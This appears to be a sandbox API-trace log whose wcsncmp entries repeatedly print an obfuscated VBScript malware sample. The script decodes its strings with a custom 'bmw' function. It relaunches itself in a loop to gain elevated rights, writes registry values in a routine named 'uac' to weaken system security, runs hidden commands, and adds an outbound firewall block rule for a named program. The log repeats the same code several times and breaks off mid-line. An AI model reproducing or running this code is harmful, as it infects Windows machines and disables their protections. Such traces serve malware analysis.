bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.299] wcsncmp (_String1=" Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.299] wcsncmp (_String1="Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0226.299] wcsncmp (_String1="id(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.299] wcsncmp (_String1="d(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet 